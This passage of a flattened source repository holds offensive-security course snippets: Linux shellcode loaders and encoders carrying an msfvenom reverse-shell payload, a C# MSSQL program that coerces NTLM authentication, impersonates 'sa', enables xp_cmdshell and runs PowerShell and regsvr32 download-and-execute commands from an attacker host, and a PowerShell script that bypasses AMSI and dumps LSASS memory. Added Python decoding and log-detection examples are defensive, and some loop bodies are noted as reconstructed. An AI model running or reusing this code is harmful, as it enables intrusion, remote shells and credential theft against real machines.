open("/tmp/payload.txt", "w") 63 | f.write(payloadFormatted) 64 | f.close() 65 | print(f"{bcolors.BOLD}{bcolors.OKGREEN}[+] Encoded payload 
written to '/tmp/payload.txt' in CSharp format!{bcolors.ENDC}") 66 | else: 67 | print(f"{bcolors.BOLD}{bcolors.OKGREEN}[+] Encoded payload (CSharp):{bcolors.ENDC}") 68 | print(payloadFormatted + "\n") 69 | 70 | # Provide the decoding function for the heck of it 71 | print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Decoding function:{bcolors.ENDC}") 72 | if args.type == "xor": 73 | decodingFunc = f"""for (int i = 0; i < buf.Length; i++) 74 | {{ 75 | buf[i] = (byte)((uint)buf[i] ^ {hex(args.key)}); 76 | }}""" 77 | 78 | if args.type == "rot": 79 | decodingFunc = f"""for (int i = 0; i < buf.Length; i++) 80 | {{ 81 | buf[i] = (byte)(((uint)buf[i] - {hex(args.key)}) & 0xFF); 82 | }}""" 83 | 84 | print(decodingFunc) 85 | -------------------------------------------------------------------------------- /Linux Shellcode Loaders/sharedLibrary_LD_LIBRARY_PATH.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | // Compile as follows 8 | //gcc -Wall -fPIC -z execstack -c -o sharedLibrary_LD_LIBRARY_PATH.o sharedLibrary_LD_LIBRARY_PATH.c 9 | //gcc -shared -o sharedLibrary_LD_LIBRARY_PATH.so sharedLibrary_LD_LIBRARY_PATH.o -ldl 10 | 11 | static void runmahpayload() __attribute__((constructor)); 12 | 13 | int gpgrt_onclose; 14 | // [...output from readelf here...] 
15 | int gpgrt_poll; 16 | 17 | // ROT13-encoded 'linux/x64/shell_reverse_tcp' payload 18 | char buf[] = "\x77\x36\x65\xa6\x77\x0f\x6c\x77\x0e\x6b\x1c\x12\x55\xa4\x55\xc6\x0f\x0d\x0d\x5d\xcd\xb5\x3e\x50\x5e\x55\x96\xf3\x77\x1d\x67\x77\x37\x65\x1c\x12\x77\x10\x6b\x55\x0c\xdb\x77\x2e\x65\x1c\x12\x82\x03\x77\x48\x65\xa6\x55\xc8\x3c\x6f\x76\x7b\x3c\x80\x75\x0d\x60\x55\x96\xf4\x5f\x64\x55\x96\xf3\x1c\x12"; 19 | 20 | void runmahpayload() { 21 | setuid(0); 22 | setgid(0); 23 | printf("Library hijacked!\n"); 24 | int buf_len = (int) sizeof(buf); 25 | for (int i=0; i 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | // To compile: 9 | // gcc -Wall -fPIC -z execstack -c -o sharedLibrary_LD_PRELOAD.o sharedLibrary_LD_PRELOAD.c 10 | // gcc -shared -o sharedLibrary_LD_PRELOAD.so sharedLibrary_LD_PRELOAD.o -ldl 11 | 12 | // msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.49.67 LPORT=80 -f c 13 | unsigned char buf[] = 14 | "\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48" 15 | "\xb9\x02\x00\x00\x50\xc0\xa8\x31\x43\x51\x48\x89\xe6\x6a\x10" 16 | "\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58" 17 | "\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f" 18 | "\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"; 19 | 20 | uid_t geteuid(void) 21 | { 22 | // Get the address of the original 'geteuid' function 23 | typeof(geteuid) *old_geteuid; 24 | old_geteuid = dlsym(RTLD_NEXT, "geteuid"); 25 | 26 | // Fork a new thread based on the current one 27 | if (fork() == 0) 28 | { 29 | // Execute shellcode in the new thread 30 | intptr_t pagesize = sysconf(_SC_PAGESIZE); 31 | 32 | // Make memory executable (required in libs) 33 | if (mprotect((void *)(((intptr_t)buf) & ~(pagesize - 1)), pagesize, PROT_READ|PROT_EXEC)) { 34 | // Handle error 35 | perror("mprotect"); 36 | return -1; 37 | } 38 | 39 | // Cast and execute 40 | int (*ret)() = (int(*)())buf; 41 | ret(); 42 | } 43 | else 44 | { 45 | // Original thread, call the original function 
        printf("[Hijacked] Returning from function...\n");
        return (*old_geteuid)();
    }
    // Not normally reached: both branches above return or exit
    printf("[Hijacked] Returning from main...\n");
    return -2;
}
--------------------------------------------------------------------------------
/Linux Shellcode Loaders/simpleLoader.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// To compile:
// gcc -o simpleLoader simpleLoader.c -z execstack
// -z execstack marks the stack executable and, on x86-64 kernels before 5.8, also
// makes every readable mapping (including .data, where buf lives) executable.
// Kernels 5.8 and later no longer do that for 64-bit binaries, so this loader
// segfaults there; use mprotect() as in sharedLibrary_LD_PRELOAD.c instead.

// XOR-encoded 'linux/x64/shell_reverse_tcp' payload (key: 0xfa)
unsigned char buf[] = "\x90\xD3\xA2\x63\x90\xF8\xA5\x90\xFB\xA4\xF5\xFF\xB2\x6D\xB2\x43\xF8\xFA\xFA\xAA\x3A\x52\xCB\xB9\xAB\xB2\x73\x1C\x90\xEA\xA0\x90\xD0\xA2\xF5\xFF\x90\xF9\xA4\xB2\x05\x34\x90\xDB\xA2\xF5\xFF\x8F\x0C\x90\xC1\xA2\x63\xB2\x41\xD5\x98\x93\x94\xD5\x89\x92\xFA\xA9\xB2\x73\x1D\xA8\xAD\xB2\x73\x1C\xF5\xFF\xFA";

int main (int argc, char **argv)
{
    int key = 250;
    int buf_len = (int) sizeof(buf);

    // Decode the payload in place (XOR with the same key is its own inverse).
    // The loop body and the cast-and-call below were cut off in this copy and are
    // restored from the pattern the other loaders in this directory use.
    for (int i=0; i<buf_len; i++) {
        buf[i] = buf[i] ^ key;
    }

    // Cast the decoded buffer to a function pointer and run it
    int (*ret)() = (int(*)())buf;
    ret();
    return 0;
}
--------------------------------------------------------------------------------
/Linux Shellcode Loaders/simpleXORencoder.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// To compile:
// gcc simpleXORencoder.c -o simpleXORencoder

// msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.49.67 LPORT=80 -f c
unsigned char buf[] =
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48"
"\xb9\x02\x00\x00\x50\xc0\xa8\x31\x43\x51\x48\x89\xe6\x6a\x10"
"\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58"
"\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
"\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05";

int main (int argc, char **argv)
{
    int key = 250;
    int buf_len = (int) sizeof(buf);   // includes the trailing NUL, which gets encoded too

    printf("XOR payload (key 0xfa):\n");

    // Print every byte XORed with the key as a C escape, ready to paste into simpleLoader.c
    // (the loop body was cut off in this copy and is restored to match simpleLoader.c's buffer)
    for(int i=0; i<buf_len; i++) {
        printf("\\x%02X", buf[i] ^ key);
    }
    printf("\n");
    return 0;
}
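The three files above carry the same msfvenom payload in three forms: plain (sharedLibrary_LD_PRELOAD.c and simpleXORencoder.c), ROT13 (sharedLibrary_LD_LIBRARY_PATH.c) and XOR 0xfa (simpleLoader.c). The following script is an added example, not part of the OSEP snippets: it reverses both encoders, checks that they yield the same bytes, and parses the decoded shellcode for the sockaddr_in that linux/x64/shell_reverse_tcp loads with a single `movabs rcx, imm64`, which is how an analyst recovers LHOST/LPORT from a captured loader. The byte strings are copied from the files above; nothing here executes shellcode.

```python
"""Decode the ROT13 and XOR payloads from the Linux loaders and extract their C2."""
import struct

# Plain payload from sharedLibrary_LD_PRELOAD.c / simpleXORencoder.c: 74 bytes
PLAIN = (
    b"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48"
    b"\xb9\x02\x00\x00\x50\xc0\xa8\x31\x43\x51\x48\x89\xe6\x6a\x10"
    b"\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58"
    b"\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
    b"\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"
)

# ROT13 buffer from sharedLibrary_LD_LIBRARY_PATH.c: each byte is the plain byte + 13 (mod 256)
ROT13 = (
    b"\x77\x36\x65\xa6\x77\x0f\x6c\x77\x0e\x6b\x1c\x12\x55\xa4\x55"
    b"\xc6\x0f\x0d\x0d\x5d\xcd\xb5\x3e\x50\x5e\x55\x96\xf3\x77\x1d"
    b"\x67\x77\x37\x65\x1c\x12\x77\x10\x6b\x55\x0c\xdb\x77\x2e\x65"
    b"\x1c\x12\x82\x03\x77\x48\x65\xa6\x55\xc8\x3c\x6f\x76\x7b\x3c"
    b"\x80\x75\x0d\x60\x55\x96\xf4\x5f\x64\x55\x96\xf3\x1c\x12"
)

# XOR buffer from simpleLoader.c: each byte XOR 0xfa. 75 bytes, because the C encoder
# loops over sizeof(buf) and so also encodes the string's NUL terminator.
XORED = (
    b"\x90\xd3\xa2\x63\x90\xf8\xa5\x90\xfb\xa4\xf5\xff\xb2\x6d\xb2"
    b"\x43\xf8\xfa\xfa\xaa\x3a\x52\xcb\xb9\xab\xb2\x73\x1c\x90\xea"
    b"\xa0\x90\xd0\xa2\xf5\xff\x90\xf9\xa4\xb2\x05\x34\x90\xdb\xa2"
    b"\xf5\xff\x8f\x0c\x90\xc1\xa2\x63\xb2\x41\xd5\x98\x93\x94\xd5"
    b"\x89\x92\xfa\xa9\xb2\x73\x1d\xa8\xad\xb2\x73\x1c\xf5\xff\xfa"
)


def rot_decode(data, rotations=13):
    """Undo the ROT encoder: subtract the rotation count from each byte, wrapping at 256."""
    return bytes((b - rotations) & 0xFF for b in data)


def xor_decode(data, key=0xFA):
    """Undo the XOR encoder; XOR with the same key is its own inverse."""
    return bytes(b ^ key for b in data)


def extract_reverse_tcp_c2(shellcode):
    """Return (ip, port) from a linux/x64/shell_reverse_tcp payload, or None.

    msfvenom materialises the sockaddr_in with one `movabs rcx, imm64` (opcode 48 b9):
    sin_family = 2 (AF_INET, little-endian), then sin_port in network byte order,
    then the four address bytes. The AF_INET word makes the marker specific enough.
    """
    marker = b"\x48\xb9\x02\x00"
    i = shellcode.find(marker)
    if i < 0 or len(shellcode) < i + 10:
        return None
    port = struct.unpack(">H", shellcode[i + 4:i + 6])[0]
    ip = ".".join(str(b) for b in shellcode[i + 6:i + 10])
    return ip, port


def analyse(encoded, scheme, key):
    """Decode with the named scheme; return (decoded, c2, execs_bin_sh)."""
    if scheme == "rot":
        decoded = rot_decode(encoded, key)
    elif scheme == "xor":
        decoded = xor_decode(encoded, key)
    else:
        raise ValueError(f"unknown scheme {scheme!r}")
    return decoded, extract_reverse_tcp_c2(decoded), b"/bin/sh\x00" in decoded


if __name__ == "__main__":
    for name, enc, scheme, key in (("ROT13", ROT13, "rot", 13), ("XOR 0xfa", XORED, "xor", 0xFA)):
        decoded, c2, shell = analyse(enc, scheme, key)
        same = decoded[:len(PLAIN)] == PLAIN
        print(f"{name}: {len(decoded)} bytes, matches plain payload: {same}, C2: {c2}, execs /bin/sh: {shell}")
```

Both buffers decode to the 74-byte plain payload (the XOR one with a trailing NUL), and the sockaddr_in inside it reads 192.168.49.67:80, matching the LHOST/LPORT in the msfvenom comment. The same two functions apply to any key or rotation count produced by the ROT/XOR encoders in this repo.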
--------------------------------------------------------------------------------
/MSSQL/App.config:
--------------------------------------------------------------------------------
(.NET Framework startup configuration for the MSSQL project; the XML markup was lost in extraction.)
--------------------------------------------------------------------------------
/MSSQL/MSSQL.csproj:
--------------------------------------------------------------------------------
(Visual Studio C# project file; the XML markup was lost in extraction. Recoverable settings: OutputType Exe, RootNamespace and AssemblyName MSSQL, TargetFrameworkVersion v4.7.2, ProjectGuid {189219A1-9A2A-4B09-8F69-6207E9996F94}, Debug and Release configurations for AnyCPU.)
--------------------------------------------------------------------------------
/MSSQL/MSSQL.sln:
--------------------------------------------------------------------------------
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.30804.86
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "MSSQL", "MSSQL.csproj", "{189219A1-9A2A-4B09-8F69-6207E9996F94}"
EndProject
Global
	GlobalSection(SolutionConfigurationPlatforms) = preSolution
		Debug|Any CPU = Debug|Any CPU
		Release|Any CPU = Release|Any CPU
	EndGlobalSection
	GlobalSection(ProjectConfigurationPlatforms) = postSolution
		{189219A1-9A2A-4B09-8F69-6207E9996F94}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
		{189219A1-9A2A-4B09-8F69-6207E9996F94}.Debug|Any CPU.Build.0 = Debug|Any CPU
		{189219A1-9A2A-4B09-8F69-6207E9996F94}.Release|Any CPU.ActiveCfg = Release|Any CPU
		{189219A1-9A2A-4B09-8F69-6207E9996F94}.Release|Any CPU.Build.0 = Release|Any CPU
	EndGlobalSection
	GlobalSection(SolutionProperties) = preSolution
		HideSolutionNode = FALSE
	EndGlobalSection
	GlobalSection(ExtensibilityGlobals) = postSolution
		SolutionGuid = {BE43F471-75F0-4066-9D25-9B513A0E3956}
	EndGlobalSection
EndGlobal
--------------------------------------------------------------------------------
/MSSQL/Program.cs:
--------------------------------------------------------------------------------
using System;
using System.Data.SqlClient;

namespace MSSQL
{
    public class Program
    {
        // Runs a query on the open connection and returns the first column of every
        // row, one per line. Failures are reported and yield an empty string so the
        // walkthrough in Main() can continue past a step the current login may not have.
        public static String executeQuery(String query, SqlConnection con)
        {
            try
            {
                SqlCommand cmd = new SqlCommand(query, con);
                SqlDataReader reader = cmd.ExecuteReader();
                String result = "";
                while (reader.Read() == true)
                {
                    result += reader[0] + "\n";
                }
                reader.Close();
                return result;
            }
            catch (SqlException e)
            {
                Console.WriteLine($"[!] Query failed: {e.Message}");
                return "";
            }
        }

        // IS_SRVROLEMEMBER returns 1 (member), 0 (not a member) or NULL (unknown role);
        // NULL comes back from executeQuery as an empty line and is treated as "no".
        public static void getGroupMembership(String groupToCheck, SqlConnection con)
        {
            String res = executeQuery($"SELECT IS_SRVROLEMEMBER('{groupToCheck}');", con);
            int role;
            if (int.TryParse(res.Trim(), out role) && role == 1)
            {
                Console.WriteLine($"[+] User is a member of the '{groupToCheck}' group.");
            }
            else
            {
                Console.WriteLine($"[-] User is not a member of the '{groupToCheck}' group.");
            }
        }

        public static void Main(string[] args)
        {
            // Target server and database; Integrated Security authenticates with the current Windows token
            String serv = "dc01.corp1.com";
            String db = "master";
            String conStr = $"Server = {serv}; Database = {db}; Integrated Security = True;";
            SqlConnection con = new SqlConnection(conStr);

            try
            {
                con.Open();
                Console.WriteLine("[+] Authenticated to MSSQL Server!");
            }
            catch (Exception e)
            {
                Console.WriteLine($"[-] Authentication failed: {e.Message}");
                Environment.Exit(1);
            }

            // Enumerate login info
            String login = executeQuery("SELECT SYSTEM_USER;", con);
            Console.WriteLine($"[*] Logged in as: {login}");
            String uname = executeQuery("SELECT USER_NAME();", con);
            Console.WriteLine($"[*] Database username: {uname}");
            getGroupMembership("public", con);
            getGroupMembership("sysadmin", con);

            // Force NTLM authentication for hash-grabbing or relaying: xp_dirtree makes the
            // SQL Server service account connect to the UNC path. Single quotes are required,
            // since the connection runs with QUOTED_IDENTIFIER ON and "..." would be parsed as an identifier.
            String targetShare = "\\\\192.168.49.67\\share";
            String res = executeQuery($"EXEC master..xp_dirtree '{targetShare}';", con);
            Console.WriteLine($"[*] Forced authentication to '{targetShare}'.");

            // Get logins that we can impersonate
            res = executeQuery("SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';", con);
            Console.WriteLine($"[*] User can impersonate the following logins: {res}.");

            // Impersonate login and get login information. EXECUTE AS sticks to the connection,
            // so every later query in this program (including the database-level impersonation
            // below) runs in the 'sa' context until a REVERT.
            String su = executeQuery("SELECT SYSTEM_USER;", con);
            String un = executeQuery("SELECT USER_NAME();", con);
            Console.WriteLine($"[*] Current login is '{su}' with database user '{un}'.");
            res = executeQuery("EXECUTE AS LOGIN = 'sa';", con);
            Console.WriteLine($"[*] Triggered impersonation.");
            su = executeQuery("SELECT SYSTEM_USER;", con);
            un = executeQuery("SELECT USER_NAME();", con);
            Console.WriteLine($"[*] Current login is '{su}' with database user '{un}'.");

            // Impersonate dbo in a trusted database and execute through 'xp_cmdshell'. This
            // works when the database is TRUSTWORTHY and owned by a sysadmin login (msdb is,
            // by default), because dbo then acts with the owner's server-level privileges.
            res = executeQuery("use msdb; EXECUTE AS USER = 'dbo';", con);
            Console.WriteLine("[*] Triggered impersonation.");
            res = executeQuery("EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;", con);
            Console.WriteLine("[*] Enabled 'xp_cmdshell'.");
            // Base64 of the UTF-16LE command: (New-Object Net.WebClient).DownloadString('http://192.168.49.67/chapter7/run.txt') | IEX
            String cmd = "powershell -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgA0ADkALgA2ADcALwBjAGgAYQBwAHQAZQByADcALwByAHUAbgAuAHQAeAB0ACcAKQAgAHwAIABJAEUAWAA=";
            res = executeQuery($"EXEC xp_cmdshell '{cmd}'", con);
            Console.WriteLine($"[*] Executed command! Result: {res}");
            // Impersonate dbo in trusted database and execute through 'sp_OACreate'
            // (the OLE Automation route; the same msdb/dbo precondition as above applies)
            res = executeQuery("use msdb; EXECUTE AS USER = 'dbo';", con);
            Console.WriteLine("[*] Triggered impersonation.");
            res = executeQuery("EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;", con);
            Console.WriteLine("[*] Enabled OLE automation procedures.");
            // Re-uses the encoded PowerShell download cradle in 'cmd' from above
            res = executeQuery($"DECLARE @myshell INT; EXEC sp_oacreate 'wscript.shell', @myshell OUTPUT; EXEC sp_oamethod @myshell, 'run', null, '{cmd}';", con);
            Console.WriteLine($"[*] Executed command!");

            //
            // Execution via loading custom assemblies is also possible, but for brevity not included here
            //

            // Enumerate linked servers
            res = executeQuery("EXEC sp_linkedservers;", con);
            Console.WriteLine($"[*] Found linked servers: {res}");

            // Execute on linked server. EXEC (...) AT needs 'RPC Out' enabled on the link; the
            // commands run on DC01 as whatever login the link is configured to use.
            res = executeQuery("EXEC ('sp_configure ''show advanced options'', 1; reconfigure;') AT DC01;", con);
            Console.WriteLine($"[*] Enabled advanced options on DC01.");
            res = executeQuery("EXEC ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT DC01;", con);
            Console.WriteLine($"[*] Enabled xp_cmdshell option on DC01.");
            res = executeQuery("EXEC ('xp_cmdshell ''whoami'';') AT DC01;", con);
            Console.WriteLine($"[*] Triggered command. Result: {res}");
            // Execute on linked server via 'openquery'. This does not need RPC Out: the string
            // is run on dc01 through the provider and must return a row set, hence the 'select 1'.
            res = executeQuery("select 1 from openquery(\"dc01\", 'select 1; EXEC sp_configure ''show advanced options'', 1; reconfigure')", con);
            Console.WriteLine($"[*] Enabled advanced options on DC01.");
            res = executeQuery("select 1 from openquery(\"dc01\", 'select 1; EXEC sp_configure ''xp_cmdshell'', 1; reconfigure')", con);
            Console.WriteLine($"[*] Enabled xp_cmdshell option on DC01.");
            res = executeQuery("select 1 from openquery(\"dc01\", 'select 1; exec xp_cmdshell ''regsvr32 /s /n /u /i:http://192.168.49.67:8080/F0t6R5A.sct scrobj.dll''')", con);
            Console.WriteLine($"[*] Triggered Meterpreter oneliner on DC01. Check your listener!");

            // Escalate via a double database link: hop to dc01 and back to appsrv01, so the
            // final query runs as the login dc01's link to appsrv01 is configured with,
            // which may carry more privileges than the login we started with.
            su = executeQuery("SELECT SYSTEM_USER;", con);
            Console.WriteLine($"[*] Current system user is '{su}' in database 'appsrv01'.");
            su = executeQuery("select mylogin from openquery(\"dc01\", 'select SYSTEM_USER as mylogin');", con);
            Console.WriteLine($"[*] Current system user is '{su}' in database 'dc01' via 1 link.");
            su = executeQuery("select mylogin from openquery(\"dc01\", 'select mylogin from openquery(\"appsrv01\", ''select SYSTEM_USER as mylogin'')');", con);
            Console.WriteLine($"[*] Current system user is '{su}' in database 'appsrv01' via 2 links.");
        }
    }
}
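Every execution path in the MSSQL Program.cs above (xp_cmdshell, sp_OACreate, and the same steps replayed on a linked server) first flips an option with sp_configure and RECONFIGURE. SQL Server records each flip in its ERRORLOG as "Configuration option '<name>' changed from 0 to 1. Run the RECONFIGURE statement to install.", on the server where the change happens, so the linked-server variants surface on DC01's log rather than the one you connected to. The script below is an added detection example, not part of the OSEP snippets: it parses ERRORLOG lines, flags the risky options the program enables, and correlates them per session (spid). The log lines are constructed for the example; the message wording is SQL Server's own.

```python
"""Flag risky sp_configure changes in SQL Server ERRORLOG lines and correlate them per session."""
import re
from datetime import datetime, timedelta

# Options whose 0 -> 1 flip is worth an alert, with the capability each one unlocks
RISKY_OPTIONS = {
    "show advanced options": "prerequisite for enabling the options below",
    "xp_cmdshell": "OS command execution through xp_cmdshell",
    "Ole Automation Procedures": "OS command execution through sp_OACreate/sp_OAMethod",
    "clr enabled": "execution of custom CLR assemblies",
}

# ERRORLOG layout: "<yyyy-mm-dd hh:mm:ss.ff> <source> <message>"
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+(?P<src>\S+)\s+"
    r"Configuration option '(?P<opt>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# Constructed sample: the sequence Program.cs produces on one session, plus routine noise
SAMPLE_ERRORLOG = """\
2021-03-01 12:00:00.12 Server      SQL Server is now ready for client connections. This is an informational message; no user action is required.
2021-03-01 12:05:10.33 spid51      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2021-03-01 12:05:10.41 spid51      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2021-03-01 12:05:11.02 spid51      Configuration option 'Ole Automation Procedures' changed from 0 to 1. Run the RECONFIGURE statement to install.
2021-03-01 13:30:00.00 spid60      Configuration option 'max server memory (MB)' changed from 2147483647 to 8192. Run the RECONFIGURE statement to install.
2021-03-01 13:31:00.00 spid60      Configuration option 'show advanced options' changed from 1 to 0. Run the RECONFIGURE statement to install.
""".splitlines()


def find_risky_enables(lines):
    """Return one dict per line that turns on (0 -> 1) an option listed in RISKY_OPTIONS."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m.group("opt") not in RISKY_OPTIONS:
            continue
        if m.group("old") == "0" and m.group("new") == "1":
            hits.append({
                "time": datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S.%f"),
                "spid": m.group("src"),
                "option": m.group("opt"),
                "why": RISKY_OPTIONS[m.group("opt")],
            })
    return hits


def correlate(hits, window_seconds=300):
    """Group hits by session. A session that enables 'show advanced options' and then at
    least one execution option inside the window is reported as an escalation attempt."""
    by_spid = {}
    for h in hits:
        by_spid.setdefault(h["spid"], []).append(h)
    alerts = []
    for spid, events in by_spid.items():
        events.sort(key=lambda e: e["time"])
        enabled = [e["option"] for e in events]
        exec_opts = [o for o in enabled if o != "show advanced options"]
        span = events[-1]["time"] - events[0]["time"]
        if "show advanced options" in enabled and exec_opts and span <= timedelta(seconds=window_seconds):
            alerts.append({"spid": spid, "options": exec_opts, "first_seen": events[0]["time"]})
    return alerts


if __name__ == "__main__":
    found = find_risky_enables(SAMPLE_ERRORLOG)
    for h in found:
        print(f"{h['time']} {h['spid']}: enabled '{h['option']}' ({h['why']})")
    for a in correlate(found):
        print(f"ALERT {a['spid']} enabled {', '.join(a['options'])} right after 'show advanced options' at {a['first_seen']}")
```

Point the script at a real ERRORLOG by replacing SAMPLE_ERRORLOG with the file's lines. Note that the xp_dirtree coercion step in Program.cs writes nothing to the ERRORLOG; that one is caught on the network or via SQL Audit, not here.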
--------------------------------------------------------------------------------
/MSSQL/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;

// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("MSSQL")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("MSSQL")]
[assembly: AssemblyCopyright("Copyright © 2021")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("189219a1-9a2a-4b09-8f69-6207e9996f94")]

// Version information for an assembly consists of the following four values:
//
//      Major Version
//      Minor Version
//      Build Number
//      Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
--------------------------------------------------------------------------------
/MiniDump/App.config:
--------------------------------------------------------------------------------
(.NET Framework startup configuration for the MiniDump project; the XML markup was lost in extraction.)
--------------------------------------------------------------------------------
/MiniDump/MiniDump.csproj:
--------------------------------------------------------------------------------
(Visual Studio C# project file; the XML markup was lost in extraction. Recoverable settings: OutputType Exe, RootNamespace and AssemblyName MiniDump, TargetFrameworkVersion v4.7.2, ProjectGuid {595D5812-AA30-4EDE-95DA-8EDD7B8844BD}, Debug and Release configurations for AnyCPU and for x64 (the x64 ones with LangVersion 7.3).)
--------------------------------------------------------------------------------
/MiniDump/MiniDump.ps1:
--------------------------------------------------------------------------------
# Bypass AMSI because we're cool
[Ref].Assembly.GetType('System.Management.Automation.Amsi'+[char]85+'tils').GetField('ams'+[char]105+'InitFailed','NonPublic,Static').SetValue($null,$true)

# Utility functions

# Resolve an exported function's address through the GetModuleHandle/GetProcAddress
# wrappers that System.dll already contains, so nothing new has to be compiled for them
function LookupFunc {
    Param ($moduleName, $functionName)
    $assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
        Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].
        Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $tmp=@()
    $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
    return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null,
        @($moduleName)), $functionName))
}

# Emit a delegate type in memory with the given parameter and return types, so a raw
# function pointer from LookupFunc can be invoked via GetDelegateForFunctionPointer
function getDelegateType {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
        [Parameter(Position = 1)] [Type] $delType = [Void]
    )
    $type = [AppDomain]::CurrentDomain.
        DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
        [System.Reflection.Emit.AssemblyBuilderAccess]::Run).
        DefineDynamicModule('InMemoryModule', $false).
        DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',
        [System.MulticastDelegate])
    $type.
        DefineConstructor('RTSpecialName, HideBySig, Public',
        [System.Reflection.CallingConventions]::Standard, $func).
        SetImplementationFlags('Runtime, Managed')
    $type.
        DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).
        SetImplementationFlags('Runtime, Managed')
    return $type.CreateType()
}

# Add dbghelp.dll and reflectively load the function while we're at it
# (somehow dbghelp.dll doesn't play nice with LookupFunc)
# Note: Add-Type with a member definition compiles a small assembly on disk, which is
# noisier than the in-memory delegate route used for OpenProcess above.
$MethodDefinition = @'
[DllImport("DbgHelp.dll", CharSet = CharSet.Unicode)]
public static extern bool MiniDumpWriteDump(
    IntPtr hProcess,
    uint processId,
    IntPtr hFile,
    uint dumpType,
    IntPtr expParam,
    IntPtr userStreamParam,
    IntPtr callbackParam
);
'@
$dbghelp = Add-Type -MemberDefinition $MethodDefinition -Name 'dbghelp' -Namespace 'Win32' -PassThru

# Get LSASS PID
$lsassPid = Get-Process lsass | select -ExpandProperty Id
Write-Host("Got lsass.exe PID: $lsassPid.")

# Get a handle on LSASS (0x1F0FFF = PROCESS_ALL_ACCESS; needs an elevated shell holding SeDebugPrivilege)
$handle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll OpenProcess),
    (getDelegateType @([UInt32], [Bool], [Int]) ([IntPtr]))).Invoke(0x1F0FFF,$false,$lsassPid)
if ($handle -eq [IntPtr]::Zero) {
    Write-Host("OpenProcess on lsass.exe failed; is this shell elevated?")
    return
}
Write-Host("Got handle on LSASS: $handle.")

# Dump process memory to file (dump type 2 = MiniDumpWithFullMemory)
$filePath = "C:\Windows\Tasks\lsass.dmp"
$dumpFile = New-Object IO.FileStream $filePath,'Create','Write','Read'
$result = $dbghelp::MiniDumpWriteDump($handle, $lsassPid, $dumpFile.Handle, 2, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)
$dumpFile.Close()

if($result) {
